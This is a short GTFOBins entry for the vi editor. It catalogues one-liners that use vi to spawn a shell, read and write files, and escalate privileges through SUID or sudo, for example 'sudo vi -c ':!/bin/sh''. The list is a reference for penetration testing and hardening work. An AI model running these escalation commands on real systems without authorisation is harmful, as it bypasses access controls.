GTFOBins.github.io/_gtfobins/vi.md
2018-12-03 13:15:57 +00:00

26 lines
593 B
Markdown

---
functions:
shell:
- code: vi -c ':!/bin/sh'
- code: |
vi
:set shell=/bin/sh
:shell
- description: This requires that vi is compiled with Python support.
code: vi -c ':py import os;os.system("sh")'
file-write:
- code: |
vi file_to_write
iDATA
^[
w
file-read:
- code: vi file_to_read
suid:
- code: ./vi -c ':!/bin/sh -p'
sudo:
- code: sudo vi -c ':!/bin/sh'
- description: This requires that vi is compiled with Python support.
code: sudo vi -c ':py import os;os.system("sh")'
---